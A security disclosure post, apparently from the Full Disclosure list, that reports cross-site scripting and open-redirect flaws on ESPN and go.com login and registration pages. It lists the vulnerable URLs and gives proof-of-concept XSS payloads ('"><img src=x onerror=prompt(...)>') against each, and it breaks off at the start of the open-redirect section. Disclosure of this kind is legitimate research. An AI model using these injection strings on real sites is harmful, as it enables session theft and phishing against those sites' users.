<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0. 7601) in Windows 8.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br class="Apple-interchange-newline" />Disclosed by:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Wang Jing, </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Singapore. (<a href="https://twitter.com/justqdjing/status/546910247650996224">@justqdjing</a>)</span><a href="http://www.tetraph.com/wangjing/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><br />http://www.tetraph.com/<wbr></wbr>wangjing/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many of the fllowing web securities have been published here, Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories, solutions details related to XSS and Open Redirect vulnerabilities and cyber intelligence recommendations.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) XSS Web Security Vulnerability</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Base on Acunetix, exploited XSS is commonly used to achieve the following malicious results</span></div>
<div style="margin: 0px;">
<br /></div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Identity theft</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Accessing sensitive or restricted information</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Gaining free access to otherwise paid for content</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Spying on user’s web browsing habits</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Altering browser functionality</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Public defamation of an individual or corporation</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Web application defacement</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Denial of Service attacks</span></li>
</ul>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URLs:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fstreak.espn.go.com%2Fen%<wbr></wbr>2FcreateOrUpdateEntrylive%<wbr></wbr>3Fgooglematchup%3Dm32620o35459</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://games.espn.go.com/<wbr></wbr>world-cup-bracket-predictor/<wbr></wbr>2014/es/login?redirect=http%<wbr></wbr>3A%2F%2Fgames.espn.go.com%<wbr></wbr>2Fworld-cup-bracket-linkedin-<wbr></wbr>predictor%2Fvk%2F2014%2Fes%<wbr></wbr>2Fgame%3Famazon%3Dcreate</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=reddit" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2F%<wbr></wbr>2Fr.espn.go.com%2Fgame%<wbr></wbr>3Famazon%3Dcreate%2Fmembers%<wbr></wbr>2FmodifyNewsletters%<wbr></wbr>3FpageNamepaypal%<wbr></wbr>3DESPNNewsletterPage&language=<wbr></wbr>en&affiliateName=espn&<wbr></wbr>regFormId=reddit</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://register.go.com/go/<wbr></wbr>sendMemberNames?aff_code=go&<wbr></wbr>appRedirect=http://register.<wbr></wbr>go.com/disney/ebay/<wbr></wbr>GuestServices/<wbr></wbr>YourYahooAccount/login</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459" target="_blank">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fstreak.espn.go.com%2Fen%<wbr></wbr>2Fyandex%<wbr></wbr>2FcreateOrUpdateEntrylive%<wbr></wbr>3Fgooglematchup%3Dm32620o35459</a><wbr></wbr>"><img src=x onerror=prompt('justqdjing')></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=espn" target="_blank">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2F%<wbr></wbr>2Fr.espn.go.com%2Fgame%<wbr></wbr>3Famazon%3Dcreate%2Fmembers%<wbr></wbr>2FmodifyNewsletters%<wbr></wbr>3FpageName%<wbr></wbr>3DESPNNewsletterPage&language=<wbr></wbr>en&affiliateName=espn&<wbr></wbr>regFormId=espn</a>"><img src=x onerror=prompt('justqdjing')></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate" target="_blank">http://games.espn.go.com/nfl-<wbr></wbr>gridiron-challenge/2014/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fgames.espn.go.com%2Fnfl-<wbr></wbr>gridiron-challenge%2Febay2014%<wbr></wbr>2Ffacebookesgame%3Fstep%<wbr></wbr>3Dcreate</a>"><img src=x onerror=prompt('justqdjing')></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login" target="_blank">https://register.go.com/go/<wbr></wbr>sendMemberNames?aff_code=go&<wbr></wbr>appRedirect=http://register.<wbr></wbr>go.com/disney/ebay/<wbr></wbr>GuestServices/YourAccount/<wbr></wbr>login</a>"><img src=x onerror=prompt('justqdjing')></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Poc Video:</span></b></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be</a></span></div>
</div>
<div style="margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii32-o77MUXaB7y2RlsNeatmSHvXvfNvzxhRgPs5GCKtRNSO_AvBktXPVXUh3gFNSFYYH0-g9VUQckQ1o8XHqDIMdFiOX7Gd5hwLkhWAD4qn_uq2iBcwXmgSI0fg9QLHQOd6_qHBSyPTE/s1600/espn_go_r_xss2.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii32-o77MUXaB7y2RlsNeatmSHvXvfNvzxhRgPs5GCKtRNSO_AvBktXPVXUh3gFNSFYYH0-g9VUQckQ1o8XHqDIMdFiOX7Gd5hwLkhWAD4qn_uq2iBcwXmgSI0fg9QLHQOd6_qHBSyPTE/s1600/espn_go_r_xss2.png" style="cursor: move;" width="400" /></span></a></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT3vrnmIqYBqFbrPgSeUNJqMEX-bpIfP5_vvsMZpmAD8X2VhrDPoz3UGpBetNmaI-iXY_4xzeETEVoA6Bf0OiAehdpXzYJYLUuOrE25jT09nJGgzNZrn0CAsbHqFC6A34cPF_dsAlTJFg/s1600/espn_go_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT3vrnmIqYBqFbrPgSeUNJqMEX-bpIfP5_vvsMZpmAD8X2VhrDPoz3UGpBetNmaI-iXY_4xzeETEVoA6Bf0OiAehdpXzYJYLUuOrE25jT09nJGgzNZrn0CAsbHqFC6A34cPF_dsAlTJFg/s1600/espn_go_xss.png" style="cursor: move;" width="400" /></span></a></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8hBYu2QGWy9qMYcDMe0jjiHi-hYCHxIXPFAcypxZmYV9iNezkbzERVhCx7M36lv61Zz8xN2qaL2IqPwKcqME9g9hdgGfaXNrtDbeL5tQjWHS7jQ9xuYwXJU1_ITz4uSEOh879n3dlmG8/s1600/espn_register_xss1.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8hBYu2QGWy9qMYcDMe0jjiHi-hYCHxIXPFAcypxZmYV9iNezkbzERVhCx7M36lv61Zz8xN2qaL2IqPwKcqME9g9hdgGfaXNrtDbeL5tQjWHS7jQ9xuYwXJU1_ITz4uSEOh879n3dlmG8/s1600/espn_register_xss1.png" style="cursor: move;" width="400" /></span></a></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Dest Redirect Privilege Escalation Vulnerability Web Security Vulnerability</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">From OWASP, an open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Use one of webpages for the following tests. The webpage address is "<a href="https://computerpitch.wordpress.com/">https://computerpitch.wordpress.com/</a>". Suppose that this webpage is malicious.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
